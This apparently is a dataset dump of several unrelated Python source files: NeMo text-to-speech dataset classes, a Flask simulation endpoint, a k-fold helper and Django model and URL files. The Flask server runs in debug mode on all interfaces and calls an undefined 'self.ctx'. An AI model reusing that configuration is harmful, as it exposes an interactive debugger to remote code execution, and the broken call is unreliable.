"duration_prior": duration_priors if DurationPrior in self.sup_data_types_set else None,
"pitch": torch.stack(pitches) if Pitch in self.sup_data_types_set else None,
"pitch_lens": torch.stack(pitches_lengths) if Pitch in self.sup_data_types_set else None,
"energy": torch.stack(energies) if Energy in self.sup_data_types_set else None,
"energy_lens": torch.stack(energies_lengths) if Energy in self.sup_data_types_set else None,
"speaker_id": torch.stack(speaker_ids) if SpeakerID in self.sup_data_types_set else None,
}
return data_dict
def _collate_fn(self, batch):
data_dict = self.general_collate_fn(batch)
joined_data = self.join_data(data_dict)
return joined_data
class MixerTTSDataset(TTSDataset):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def _albert(self):
from transformers import AlbertTokenizer # noqa pylint: disable=import-outside-toplevel
self.lm_model_tokenizer = AlbertTokenizer.from_pretrained('albert-base-v2')
self.lm_padding_value = self.lm_model_tokenizer._convert_token_to_id('<pad>')
space_value = self.lm_model_tokenizer._convert_token_to_id('▁')
self.id2lm_tokens = {}
for i, d in enumerate(self.data):
raw_text = d["raw_text"]
assert isinstance(self.text_tokenizer, EnglishPhonemesTokenizer) or isinstance(
self.text_tokenizer, EnglishCharsTokenizer
)
preprocess_text_as_tts_input = self.text_tokenizer.text_preprocessing_func(raw_text)
lm_tokens_as_ids = self.lm_model_tokenizer.encode(preprocess_text_as_tts_input, add_special_tokens=False)
if self.text_tokenizer.pad_with_space:
lm_tokens_as_ids = [space_value] + lm_tokens_as_ids + [space_value]
self.id2lm_tokens[i] = lm_tokens_as_ids
def add_lm_tokens(self, **kwargs):
lm_model = kwargs.pop('lm_model')
if lm_model == "albert":
self._albert()
else:
raise NotImplementedError(
f"{lm_model} lm model is not supported. Only albert is supported at this moment."
)
def __getitem__(self, index):
(
audio,
audio_length,
text,
text_length,
log_mel,
log_mel_length,
durations,
duration_prior,
pitch,
pitch_length,
energy,
energy_length,
speaker_id,
) = super().__getitem__(index)
lm_tokens = None
if LMTokens in self.sup_data_types_set:
lm_tokens = torch.tensor(self.id2lm_tokens[index]).long()
return (
audio,
audio_length,
text,
text_length,
log_mel,
log_mel_length,
durations,
duration_prior,
pitch,
pitch_length,
energy,
energy_length,
speaker_id,
lm_tokens,
)
def _collate_fn(self, batch):
batch = list(zip(*batch))
data_dict = self.general_collate_fn(list(zip(*batch[:13])))
lm_tokens_list = batch[13]
if LMTokens in self.sup_data_types_set:
lm_tokens = torch.full(
(len(lm_tokens_list), max([lm_tokens.shape[0] for lm_tokens in lm_tokens_list])),
fill_value=self.lm_padding_value,
)
for i, lm_tokens_i in enumerate(lm_tokens_list):
lm_tokens[i, : lm_tokens_i.shape[0]] = lm_tokens_i
data_dict[LMTokens.name] = lm_tokens
joined_data = self.join_data(data_dict)
return joined_data
| # Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import pickle
from pathlib import Path
from typing import Callable, Dict, List, Optional, Union
import librosa
import torch
from nemo_text_processing.text_normalization.normalize import Normalizer
from tqdm import tqdm
from nemo.collections.asr.parts.preprocessing.features import WaveformFeaturizer
from nemo.collections.tts.torch.helpers import (
BetaBinomialInterpolator,
beta_binomial_prior_distribution,
general_padding,
)
from nemo.collections.tts.torch.tts_data_types import (
DATA_STR2DATA_CLASS,
MAIN_DATA_TYPES,
VALID_SUPPLEMENTARY_DATA_TYPES,
DurationPrior,
Durations,
Energy,
LMTokens,
LogMel,
Pitch,
SpeakerID,
WithLens,
)
from nemo.collections.tts.torch.tts_tokenizers import BaseTokenizer, EnglishCharsTokenizer, EnglishPhonemesTokenizer
from nemo.core.classes import Dataset
from nemo.utils import logging
class TTSDataset(Dataset):
def __init__(
self,
manifest_filepath: str,
sample_rate: int,
text_tokenizer: Union[BaseTokenizer, Callable[[str], List[int]]],
tokens: Optional[List[str]] = None,
text_normalizer: Optional[Union[Normalizer, Callable[[str], str]]] = None,
text_normalizer_call_args: Optional[Dict] = None,
text_tokenizer_pad_id: Optional[int] = None,
sup_data_types: Optional[List[str]] = None,
sup_data_path: Optional[Union[Path, str]] = None,
max_duration: Optional[float] = None,
min_duration: Optional[float] = None,
ignore_file: Optional[str] = None,
trim: bool = False,
n_fft=1024,
win_length=None,
hop_length=None,
window="hann",
n_mels=80,
lowfreq=0,
highfreq=None,
**kwargs,
):
"""Dataset that loads main data types (audio and text) and specified supplementary data types (e.g. log mel, durations, pitch).
Most supplementary data types will be computed on the fly and saved in the supplementary_folder if they did not exist before.
Arguments for supplementary data should be also specified in this class and they will be used from kwargs (see keyword args section).
Args:
manifest_filepath (str, Path, List[str, Path]): Path(s) to the .json manifests containing information on the
dataset. Each line in the .json file should be valid json. Note: the .json file itself is not valid
json. Each line should contain the following:
"audio_filepath": <PATH_TO_WAV>
"mel_filepath": <PATH_TO_LOG_MEL_PT> (Optional)
"duration": <Duration of audio clip in seconds> (Optional)
"text": <THE_TRANSCRIPT> (Optional)
sample_rate (int): The sample rate of the audio. Or the sample rate that we will resample all files to.
text_tokenizer (Optional[Union[BaseTokenizer, Callable[[str], List[int]]]]): BaseTokenizer or callable which represents text tokenizer.
tokens (Optional[List[str]]): Tokens from text_tokenizer. Should be specified if text_tokenizer is not BaseTokenizer.
text_normalizer (Optional[Union[Normalizer, Callable[[str], str]]]): Normalizer or callable which represents text normalizer.
text_normalizer_call_args (Optional[Dict]): Additional arguments for text_normalizer function.
text_tokenizer_pad_id (Optional[int]): Index of padding. Should be specified if text_tokenizer is not BaseTokenizer.
sup_data_types (Optional[List[str]]): List of supplementary data types.
sup_data_path (Optional[Union[Path, str]]): A folder that contains or will contain supplementary data (e.g. pitch).
max_duration (Optional[float]): Max duration of audio clips in seconds. All samples exceeding this will be
pruned prior to training. Note: Requires "duration" to be set in the manifest file. It does not load
audio to compute duration. Defaults to None which does not prune.
min_duration (Optional[float]): Min duration of audio clips in seconds. All samples lower than this will be
pruned prior to training. Note: Requires "duration" to be set in the manifest file. It does not load
audio to compute duration. Defaults to None which does not prune.
ignore_file (Optional[str, Path]): The location of a pickle-saved list of audio_ids (the stem of the audio
files) that will be pruned prior to training. Defaults to None which does not prune.
trim (Optional[bool]): Whether to apply librosa.effects.trim to the audio file. Defaults to False.
n_fft (Optional[int]): The number of fft samples. Defaults to 1024
win_length (Optional[int]): The length of the stft windows. Defaults to None which uses n_fft.
hop_length (Optional[int]): The hope length between fft computations. Defaults to None which uses n_fft//4.
window (Optional[str]): One of 'hann', 'hamming', 'blackman','bartlett', 'none'. Which corresponds to the
equivalent torch window function.
n_mels (Optional[int]): The number of mel filters. Defaults to 80.
lowfreq (Optional[int]): The lowfreq input to the mel filter calculation. Defaults to 0.
highfreq (Optional[int]): The highfreq input to the mel filter calculation. Defaults to None.
Keyword Args:
durs_file (Optional[str]): String path to pickled durations location.
durs_type (Optional[str]): Type of durations. Currently supported only "aligned-based".
use_beta_binomial_interpolator (Optional[bool]): Whether to use beta-binomial interpolator. Defaults to False.
pitch_fmin (Optional[float]): The fmin input to librosa.pyin. Defaults to librosa.note_to_hz('C2').
pitch_fmax (Optional[float]): The fmax input to librosa.pyin. Defaults to librosa.note_to_hz('C7').
pitch_avg (Optional[float]): The mean that we use to normalize the pitch.
pitch_std (Optional[float]): The std that we use to normalize the pitch.
pitch_norm (Optional[bool]): Whether to normalize pitch (via pitch_avg and pitch_std) or not.
"""
super().__init__()
self.text_normalizer = text_normalizer
self.text_normalizer_call = (
self.text_normalizer.normalize if isinstance(self.text_normalizer, Normalizer) else self.text_normalizer
)
self.text_normalizer_call_args = text_normalizer_call_args if text_normalizer_call_args is not None else {}
self.text_tokenizer = text_tokenizer
if isinstance(self.text_tokenizer, BaseTokenizer):
self.text_tokenizer_pad_id = text_tokenizer.pad
self.tokens = text_tokenizer.tokens
else:
if text_tokenizer_pad_id is None:
raise ValueError(f"text_tokenizer_pad_id must be specified if text_tokenizer is not BaseTokenizer")
if tokens is None:
raise ValueError(f"tokens must be specified if text_tokenizer is not BaseTokenizer")
self.text_tokenizer_pad_id = text_tokenizer_pad_id
self.tokens = tokens
if isinstance(manifest_filepath, str):
manifest_filepath = [manifest_filepath]
self.manifest_filepath = manifest_filepath
if sup_data_path is not None:
Path(sup_data_path).mkdir(parents=True, exist_ok=True)
self.sup_data_path = sup_data_path
self.sup_data_types = (
[DATA_STR2DATA_CLASS[d_as_str] for d_as_str in sup_data_types] if sup_data_types is not None else []
)
self.sup_data_types_set = set(self.sup_data_types)
self.data = []
audio_files = []
total_duration = 0
for manifest_file in self.manifest_filepath:
with open(Path(manifest_file).expanduser(), 'r') as f:
logging.info(f"Loading dataset from {manifest_file}.")
for line in tqdm(f):
item = json.loads(line)
file_info = {
"audio_filepath": item["audio_filepath"],
"mel_filepath": item["mel_filepath"] if "mel_filepath" in item else None,
"duration": item["duration"] if "duration" in item else None,
"text_tokens": None,
"speaker_id": item["speaker"] if "speaker" in item else None,
}
if "text" in item:
text = item["text"]
if self.text_normalizer is not None:
text = self.text_normalizer_call(text, **self.text_normalizer_call_args)
text_tokens = self.text_tokenizer(text)
file_info["raw_text"] = item["text"]
file_info["text_tokens"] = text_tokens
audio_files.append(file_info)
if file_info["duration"] is None:
logging.info(
"Not all audio files have duration information. Duration logging will be disabled."
)
total_duration = None
if total_duration is not None:
total_duration += item["duration"]
logging.info(f"Loaded dataset with {len(audio_files)} files.")
if total_duration is not None:
logging.info(f"Dataset contains {total_duration / 3600:.2f} hours.")
if ignore_file:
logging.info(f"using {ignore_file} to prune dataset.")
with open(Path(ignore_file).expanduser(), "rb") as f:
wavs_to_ignore = set(pickle.load(f))
pruned_duration = 0 if total_duration is not None else None
pruned_items = 0
for item in audio_files:
audio_path = item['audio_filepath']
audio_id = Path(audio_path).stem
# Prune data according to min/max_duration & the ignore file
if total_duration is not None:
if (min_duration and item["duration"] < min_duration) or (
max_duration and item["duration"] > max_duration
):
pruned_duration += item["duration"]
pruned_items += 1
continue
if ignore_file and (audio_id in wavs_to_ignore):
pruned_items += 1
pruned_duration += item["duration"]
wavs_to_ignore.remove(audio_id)
continue
self.data.append(item)
logging.info(f"Pruned {pruned_items} files. Final dataset contains {len(self.data)} files")
if pruned_duration is not None:
logging.info(
f"Pruned {pruned_duration / 3600:.2f} hours. Final dataset contains "
f"{(total_duration - pruned_duration) / 3600:.2f} hours."
)
self.sample_rate = sample_rate
self.featurizer = WaveformFeaturizer(sample_rate=self.sample_rate)
self.trim = trim
self.n_fft = n_fft
self.n_mels = n_mels
self.lowfreq = lowfreq
self.highfreq = highfreq
self.window = window
self.win_length = win_length or self.n_fft
self.hop_length = hop_length
self.hop_len = self.hop_length or self.n_fft // 4
self.fb = torch.tensor(
librosa.filters.mel(
self.sample_rate, self.n_fft, n_mels=self.n_mels, fmin=self.lowfreq, fmax=self.highfreq
),
dtype=torch.float,
).unsqueeze(0)
window_fn = {
'hann': torch.hann_window,
'hamming': torch.hamming_window,
'blackman': torch.blackman_window,
'bartlett': torch.bartlett_window,
'none': None,
}.get(self.window, None)
self.stft = lambda x: torch.stft(
input=x,
n_fft=self.n_fft,
hop_length=self.hop_len,
win_length=self.win_length,
window=window_fn(self.win_length, periodic=False).to(torch.float) if window_fn else None,
)
for data_type in self.sup_data_types:
if data_type not in VALID_SUPPLEMENTARY_DATA_TYPES:
raise NotImplementedError(f"Current implementation of TTSDataset doesn't support {data_type} type.")
getattr(self, f"add_{data_type.name}")(**kwargs)
def add_log_mel(self, **kwargs):
pass
def add_durations(self, **kwargs):
durs_file = kwargs.pop('durs_file')
durs_type = kwargs.pop('durs_type')
audio_stem2durs = torch.load(durs_file)
self.durs = []
for tag in [Path(d["audio_filepath"]).stem for d in self.data]:
durs = audio_stem2durs[tag]
if durs_type == "aligner-based":
self.durs.append(durs)
else:
raise NotImplementedError(
f"{durs_type} duration type is not supported. Only align-based is supported at this moment."
)
def add_duration_prior(self, **kwargs):
self.use_beta_binomial_interpolator = kwargs.pop('use_beta_binomial_interpolator', False)
if self.use_beta_binomial_interpolator:
self.beta_binomial_interpolator = BetaBinomialInterpolator()
def add_pitch(self, **kwargs):
self.pitch_fmin = kwargs.pop("pitch_fmin", librosa.note_to_hz('C2'))
self.pitch_fmax = kwargs.pop("pitch_fmax", librosa.note_to_hz('C7'))
self.pitch_avg = kwargs.pop("pitch_avg", None)
self.pitch_std = kwargs.pop("pitch_std", None)
self.pitch_norm = kwargs.pop("pitch_norm", False)
def add_energy(self, **kwargs):
pass
def add_speaker_id(self, **kwargs):
pass
def get_spec(self, audio):
with torch.cuda.amp.autocast(enabled=False):
spec = self.stft(audio)
if spec.dtype in [torch.cfloat, torch.cdouble]:
spec = torch.view_as_real(spec)
spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-9)
return spec
def get_log_mel(self, audio):
with torch.cuda.amp.autocast(enabled=False):
spec = self.get_spec(audio)
mel = torch.matmul(self.fb.to(spec.dtype), spec)
log_mel = torch.log(torch.clamp(mel, min=torch.finfo(mel.dtype).tiny))
return log_mel
def __getitem__(self, index):
sample = self.data[index]
audio_stem = Path(sample["audio_filepath"]).stem
features = self.featurizer.process(sample["audio_filepath"], trim=self.trim)
audio, audio_length = features, torch.tensor(features.shape[0]).long()
text = torch.tensor(sample["text_tokens"]).long()
text_length = torch.tensor(len(sample["text_tokens"])).long()
log_mel, log_mel_length = None, None
if LogMel in self.sup_data_types_set:
mel_path = sample["mel_filepath"]
if mel_path is not None and Path(mel_path).exists():
log_mel = torch.load(mel_path)
else:
mel_path = Path(self.sup_data_path) / f"mel_{audio_stem}.pt"
if mel_path.exists():
log_mel = torch.load(mel_path)
else:
log_mel = self.get_log_mel(audio)
torch.save(log_mel, mel_path)
log_mel = log_mel.squeeze(0)
log_mel_length = torch.tensor(log_mel.shape[1]).long()
durations = None
if Durations in self.sup_data_types_set:
durations = self.durs[index]
duration_prior = None
if DurationPrior in self.sup_data_types_set:
if self.use_beta_binomial_interpolator:
mel_len = self.get_log_mel(audio).shape[2]
duration_prior = torch.from_numpy(self.beta_binomial_interpolator(mel_len, text_length.item()))
else:
prior_path = Path(self.sup_data_path) / f"pr_{audio_stem}.pt"
if prior_path.exists():
duration_prior = torch.load(prior_path)
else:
mel_len = self.get_log_mel(audio).shape[2]
duration_prior = beta_binomial_prior_distribution(text_length, mel_len)
duration_prior = torch.from_numpy(duration_prior)
torch.save(duration_prior, prior_path)
pitch, pitch_length = None, None
if Pitch in self.sup_data_types_set:
pitch_name = (
f"{audio_stem}_pitch_pyin_"
f"fmin{self.pitch_fmin}_fmax{self.pitch_fmax}_"
f"fl{self.win_length}_hs{self.hop_len}.pt"
)
pitch_path = Path(self.sup_data_path) / pitch_name
if pitch_path.exists():
pitch = torch.load(pitch_path).float()
else:
pitch, _, _ = librosa.pyin(
audio.numpy(),
fmin=self.pitch_fmin,
fmax=self.pitch_fmax,
frame_length=self.win_length,
sr=self.sample_rate,
fill_na=0.0,
)
pitch = torch.from_numpy(pitch).float()
torch.save(pitch, pitch_path)
if self.pitch_avg is not None and self.pitch_std is not None and self.pitch_norm:
pitch -= self.pitch_avg
pitch[pitch == -self.pitch_avg] = 0.0 # Zero out values that were perviously zero
pitch /= self.pitch_std
pitch_length = torch.tensor(len(pitch)).long()
energy, energy_length = None, None
if Energy in self.sup_data_types_set:
energy_path = Path(self.sup_data_path) / f"{audio_stem}_energy_wl{self.win_length}_hs{self.hop_len}.pt"
if energy_path.exists():
energy = torch.load(energy_path).float()
else:
spec = self.get_spec(audio)
energy = torch.linalg.norm(spec.squeeze(0), axis=0).float()
torch.save(energy, energy_path)
energy_length = torch.tensor(len(energy)).long()
speaker_id = None
if SpeakerID in self.sup_data_types_set:
speaker_id = torch.tensor(sample["speaker_id"]).long()
return (
audio,
audio_length,
text,
text_length,
log_mel,
log_mel_length,
durations,
duration_prior,
pitch,
pitch_length,
energy,
energy_length,
speaker_id,
)
def __len__(self):
return len(self.data)
def join_data(self, data_dict):
result = []
for data_type in MAIN_DATA_TYPES + self.sup_data_types:
result.append(data_dict[data_type.name])
if issubclass(data_type, WithLens):
result.append(data_dict[f"{data_type.name}_lens"])
return tuple(result)
def general_collate_fn(self, batch):
(
_,
audio_lengths,
_,
tokens_lengths,
_,
log_mel_lengths,
durations_list,
duration_priors_list,
pitches,
pitches_lengths,
energies,
energies_lengths,
_,
) = zip(*batch)
max_audio_len = max(audio_lengths).item()
max_tokens_len = max(tokens_lengths).item()
max_log_mel_len = max(log_mel_lengths) if LogMel in self.sup_data_types_set else None
max_durations_len = max([len(i) for i in durations_list]) if Durations in self.sup_data_types_set else None
max_pitches_len = max(pitches_lengths).item() if Pitch in self.sup_data_types_set else None
max_energies_len = max(energies_lengths).item() if Energy in self.sup_data_types_set else None
if LogMel in self.sup_data_types_set:
log_mel_pad = torch.finfo(batch[0][2].dtype).tiny
duration_priors = (
torch.zeros(
len(duration_priors_list),
max([prior_i.shape[0] for prior_i in duration_priors_list]),
max([prior_i.shape[1] for prior_i in duration_priors_list]),
)
if DurationPrior in self.sup_data_types_set
else []
)
audios, tokens, log_mels, durations_list, pitches, energies, speaker_ids = [], [], [], [], [], [], []
for i, sample_tuple in enumerate(batch):
(
audio,
audio_len,
token,
token_len,
log_mel,
log_mel_len,
durations,
duration_prior,
pitch,
pitch_length,
energy,
energy_length,
speaker_id,
) = sample_tuple
audio = general_padding(audio, audio_len.item(), max_audio_len)
audios.append(audio)
token = general_padding(token, token_len.item(), max_tokens_len, pad_value=self.text_tokenizer_pad_id)
tokens.append(token)
if LogMel in self.sup_data_types_set:
log_mels.append(general_padding(log_mel, log_mel_len, max_log_mel_len, pad_value=log_mel_pad))
if Durations in self.sup_data_types_set:
durations_list.append(general_padding(durations, len(durations), max_durations_len))
if DurationPrior in self.sup_data_types_set:
duration_priors[i, : duration_prior.shape[0], : duration_prior.shape[1]] = duration_prior
if Pitch in self.sup_data_types_set:
pitches.append(general_padding(pitch, pitch_length.item(), max_pitches_len))
if Energy in self.sup_data_types_set:
energies.append(general_padding(energy, energy_length.item(), max_energies_len))
if SpeakerID in self.sup_data_types_set:
speaker_ids.append(speaker_id)
data_dict = {
"audio": torch.stack(audios),
"audio_lens": torch.stack(audio_lengths),
"text": torch.stack(tokens),
"text_lens": torch.stack(tokens_lengths),
"log_mel": torch.stack(log_mels) if LogMel in self.sup_data_types_set else None,
"log_mel_lens": torch.stack(log_mel_lengths) if LogMel in self.sup_data_types_set else None,
"durations": torch.stack(durations_list) if Durations in self.sup_data_types_set else None,
"duration_prior": duration_priors if DurationPrior in self.sup_data_types_set else None,
"pitch": torch.stack(pitches) if Pitch in self.sup_data_types_set else None,
"pitch_lens": torch.stack(pitches_lengths) if Pitch in self.sup_data_types_set else None,
"energy": torch.stack(energies) if Energy in self.sup_data_types_set else None,
"energy_lens": torch.stack(energies_lengths) if Energy in self.sup_data_types_set else None,
"speaker_id": torch.stack(speaker_ids) if SpeakerID in self.sup_data_types_set else None,
}
return data_dict
def _collate_fn(self, batch):
data_dict = self.general_collate_fn(batch)
joined_data = self.join_data(data_dict)
return joined_data
class MixerTTSDataset(TTSDataset):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def _albert(self):
from transformers import AlbertTokenizer # noqa pylint: disable=import-outside-toplevel
self.lm_model_tokenizer = AlbertTokenizer.from_pretrained('albert-base-v2')
self.lm_padding_value = self.lm_model_tokenizer._convert_token_to_id('<pad>')
space_value = self.lm_model_tokenizer._convert_token_to_id('▁')
self.id2lm_tokens = {}
for i, d in enumerate(self.data):
raw_text = d["raw_text"]
assert isinstance(self.text_tokenizer, EnglishPhonemesTokenizer) or isinstance(
self.text_tokenizer, EnglishCharsTokenizer
)
preprocess_text_as_tts_input = self.text_tokenizer.text_preprocessing_func(raw_text)
lm_tokens_as_ids = self.lm_model_tokenizer.encode(preprocess_text_as_tts_input, add_special_tokens=False)
if self.text_tokenizer.pad_with_space:
lm_tokens_as_ids = [space_value] + lm_tokens_as_ids + [space_value]
self.id2lm_tokens[i] = lm_tokens_as_ids
def add_lm_tokens(self, **kwargs):
lm_model = kwargs.pop('lm_model')
if lm_model == "albert":
self._albert()
else:
raise NotImplementedError(
f"{lm_model} lm model is not supported. Only albert is supported at this moment."
)
def __getitem__(self, index):
(
audio,
audio_length,
text,
text_length,
log_mel,
log_mel_length,
durations,
duration_prior,
pitch,
pitch_length,
energy,
energy_length,
speaker_id,
) = super().__getitem__(index)
lm_tokens = None
if LMTokens in self.sup_data_types_set:
lm_tokens = torch.tensor(self.id2lm_tokens[index]).long()
return (
audio,
audio_length,
text,
text_length,
log_mel,
log_mel_length,
durations,
duration_prior,
pitch,
pitch_length,
energy,
energy_length,
speaker_id,
lm_tokens,
)
def _collate_fn(self, batch):
batch = list(zip(*batch))
data_dict = self.general_collate_fn(list(zip(*batch[:13])))
lm_tokens_list = batch[13]
if LMTokens in self.sup_data_types_set:
lm_tokens = torch.full(
(len(lm_tokens_list), max([lm_tokens.shape[0] for lm_tokens in lm_tokens_list])),
fill_value=self.lm_padding_value,
)
for i, lm_tokens_i in enumerate(lm_tokens_list):
lm_tokens[i, : lm_tokens_i.shape[0]] = lm_tokens_i
data_dict[LMTokens.name] = lm_tokens
joined_data = self.join_data(data_dict)
return joined_data
| en | 0.769194 | # Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Dataset that loads main data types (audio and text) and specified supplementary data types (e.g. log mel, durations, pitch). Most supplementary data types will be computed on the fly and saved in the supplementary_folder if they did not exist before. Arguments for supplementary data should be also specified in this class and they will be used from kwargs (see keyword args section). Args: manifest_filepath (str, Path, List[str, Path]): Path(s) to the .json manifests containing information on the dataset. Each line in the .json file should be valid json. Note: the .json file itself is not valid json. Each line should contain the following: "audio_filepath": <PATH_TO_WAV> "mel_filepath": <PATH_TO_LOG_MEL_PT> (Optional) "duration": <Duration of audio clip in seconds> (Optional) "text": <THE_TRANSCRIPT> (Optional) sample_rate (int): The sample rate of the audio. Or the sample rate that we will resample all files to. text_tokenizer (Optional[Union[BaseTokenizer, Callable[[str], List[int]]]]): BaseTokenizer or callable which represents text tokenizer. tokens (Optional[List[str]]): Tokens from text_tokenizer. Should be specified if text_tokenizer is not BaseTokenizer. text_normalizer (Optional[Union[Normalizer, Callable[[str], str]]]): Normalizer or callable which represents text normalizer. text_normalizer_call_args (Optional[Dict]): Additional arguments for text_normalizer function. text_tokenizer_pad_id (Optional[int]): Index of padding. Should be specified if text_tokenizer is not BaseTokenizer. sup_data_types (Optional[List[str]]): List of supplementary data types. sup_data_path (Optional[Union[Path, str]]): A folder that contains or will contain supplementary data (e.g. pitch). max_duration (Optional[float]): Max duration of audio clips in seconds. All samples exceeding this will be pruned prior to training. Note: Requires "duration" to be set in the manifest file. It does not load audio to compute duration. Defaults to None which does not prune. min_duration (Optional[float]): Min duration of audio clips in seconds. All samples lower than this will be pruned prior to training. Note: Requires "duration" to be set in the manifest file. It does not load audio to compute duration. Defaults to None which does not prune. ignore_file (Optional[str, Path]): The location of a pickle-saved list of audio_ids (the stem of the audio files) that will be pruned prior to training. Defaults to None which does not prune. trim (Optional[bool]): Whether to apply librosa.effects.trim to the audio file. Defaults to False. n_fft (Optional[int]): The number of fft samples. Defaults to 1024 win_length (Optional[int]): The length of the stft windows. Defaults to None which uses n_fft. hop_length (Optional[int]): The hope length between fft computations. Defaults to None which uses n_fft//4. window (Optional[str]): One of 'hann', 'hamming', 'blackman','bartlett', 'none'. Which corresponds to the equivalent torch window function. n_mels (Optional[int]): The number of mel filters. Defaults to 80. lowfreq (Optional[int]): The lowfreq input to the mel filter calculation. Defaults to 0. highfreq (Optional[int]): The highfreq input to the mel filter calculation. Defaults to None. Keyword Args: durs_file (Optional[str]): String path to pickled durations location. durs_type (Optional[str]): Type of durations. Currently supported only "aligned-based". use_beta_binomial_interpolator (Optional[bool]): Whether to use beta-binomial interpolator. Defaults to False. pitch_fmin (Optional[float]): The fmin input to librosa.pyin. Defaults to librosa.note_to_hz('C2'). pitch_fmax (Optional[float]): The fmax input to librosa.pyin. Defaults to librosa.note_to_hz('C7'). pitch_avg (Optional[float]): The mean that we use to normalize the pitch. pitch_std (Optional[float]): The std that we use to normalize the pitch. pitch_norm (Optional[bool]): Whether to normalize pitch (via pitch_avg and pitch_std) or not. # Prune data according to min/max_duration & the ignore file # Zero out values that were perviously zero # noqa pylint: disable=import-outside-toplevel | 1.519666 | 2 |
anmotordesign/server.py | MarkWengSTR/ansys-maxwell-online | 8 | 8089 | from flask import Flask, request, jsonify
from flask_cors import CORS
from run import run_ansys
from api.validate import spec_present, data_type_validate, spec_keys_validate, ansys_overload_check
ansys_processing_count = 0
# debug
# import ipdb; ipdb.set_trace()
app = Flask(__name__)
CORS(app) # local development cors
@app.route('/run_simu', methods=["POST"])
def run_simulation():
global ansys_processing_count
ansys_processing_count += 1
ctx = {
"request": request.get_json(),
"allow_run": True,
"process": {
"limit": 4,
"count": ansys_processing_count,
},
"start_run_response": {"msg": "start run at background"},
"error": {
"validate": {"msg": ""}
}
}
if spec_present(ctx) and \
data_type_validate(ctx) and \
spec_keys_validate(ctx) and \
ansys_overload_check(ctx):
ctx = run_ansys(self.ctx)
else:
return jsonify(ctx["error"]["validate"])
return jsonify(ctx["response"])
if __name__ == "__main__":
app.run(host='0.0.0.0', port=5000, debug=True)
| from flask import Flask, request, jsonify
from flask_cors import CORS
from run import run_ansys
from api.validate import spec_present, data_type_validate, spec_keys_validate, ansys_overload_check
ansys_processing_count = 0
# debug
# import ipdb; ipdb.set_trace()
app = Flask(__name__)
CORS(app) # local development cors
@app.route('/run_simu', methods=["POST"])
def run_simulation():
global ansys_processing_count
ansys_processing_count += 1
ctx = {
"request": request.get_json(),
"allow_run": True,
"process": {
"limit": 4,
"count": ansys_processing_count,
},
"start_run_response": {"msg": "start run at background"},
"error": {
"validate": {"msg": ""}
}
}
if spec_present(ctx) and \
data_type_validate(ctx) and \
spec_keys_validate(ctx) and \
ansys_overload_check(ctx):
ctx = run_ansys(self.ctx)
else:
return jsonify(ctx["error"]["validate"])
return jsonify(ctx["response"])
if __name__ == "__main__":
app.run(host='0.0.0.0', port=5000, debug=True)
| en | 0.341183 | # debug # import ipdb; ipdb.set_trace() # local development cors | 2.527788 | 3 |
cnn/donas_utils/dataset/__init__.py | eric8607242/darts | 0 | 8090 | <reponame>eric8607242/darts
from .dataset import get_cifar100, get_cifar10, get_imagenet_lmdb, get_imagenet
__all__ = ["get_cifar100", "get_cifar10", "get_imagenet_lmdb", "get_imagenet"]
| from .dataset import get_cifar100, get_cifar10, get_imagenet_lmdb, get_imagenet
__all__ = ["get_cifar100", "get_cifar10", "get_imagenet_lmdb", "get_imagenet"] | none | 1 | 1.200992 | 1 |
|
classifier/cross_validation.py | ahmdrz/spam-classifier | 1 | 8091 | <gh_stars>1-10
from sklearn.model_selection import KFold
def kfold_cross_validation(data, k=10):
kfold = KFold(n_splits=k)
for train, test in kfold.split(data):
yield data[train], data[test] | from sklearn.model_selection import KFold
def kfold_cross_validation(data, k=10):
kfold = KFold(n_splits=k)
for train, test in kfold.split(data):
yield data[train], data[test] | none | 1 | 2.728278 | 3 |
|
category/models.py | captainxavier/AutoBlog | 0 | 8092 | from django.db import models
class Category(models.Model):
title = models.CharField(max_length=20)
class Meta:
db_table = 'category'
verbose_name = ("Category")
verbose_name_plural = ("Categories")
def __str__(self):
return self.title
| from django.db import models
class Category(models.Model):
title = models.CharField(max_length=20)
class Meta:
db_table = 'category'
verbose_name = ("Category")
verbose_name_plural = ("Categories")
def __str__(self):
return self.title
| none | 1 | 2.350949 | 2 |
|
admin_tools/urls.py | aucoeur/WeVoteServer | 44 | 8093 | # admin_tools/urls.py
# Brought to you by We Vote. Be good.
# -*- coding: UTF-8 -*-
from django.conf.urls import re_path
from . import views
urlpatterns = [
re_path(r'^$', views.admin_home_view, name='admin_home',),
re_path(r'^data_cleanup/$', views.data_cleanup_view, name='data_cleanup'),
re_path(r'^data_cleanup_organization_analysis/$',
views.data_cleanup_organization_analysis_view, name='data_cleanup_organization_analysis'),
re_path(r'^data_cleanup_organization_list_analysis/$',
views.data_cleanup_organization_list_analysis_view, name='data_cleanup_organization_list_analysis'),
re_path(r'^data_cleanup_position_list_analysis/$',
views.data_cleanup_position_list_analysis_view, name='data_cleanup_position_list_analysis'),
re_path(r'^data_cleanup_voter_hanging_data_process/$',
views.data_cleanup_voter_hanging_data_process_view, name='data_cleanup_voter_hanging_data_process'),
re_path(r'^data_cleanup_voter_list_analysis/$',
views.data_cleanup_voter_list_analysis_view, name='data_cleanup_voter_list_analysis'),
re_path(r'^data_voter_statistics/$', views.data_voter_statistics_view, name='data_voter_statistics'),
re_path(r'^import_sample_data/$', views.import_sample_data_view, name='import_sample_data'),
re_path(r'^statistics/$', views.statistics_summary_view, name='statistics_summary'),
re_path(r'^sync_dashboard/$', views.sync_data_with_master_servers_view, name='sync_dashboard'),
]
| # admin_tools/urls.py
# Brought to you by We Vote. Be good.
# -*- coding: UTF-8 -*-
from django.conf.urls import re_path
from . import views
urlpatterns = [
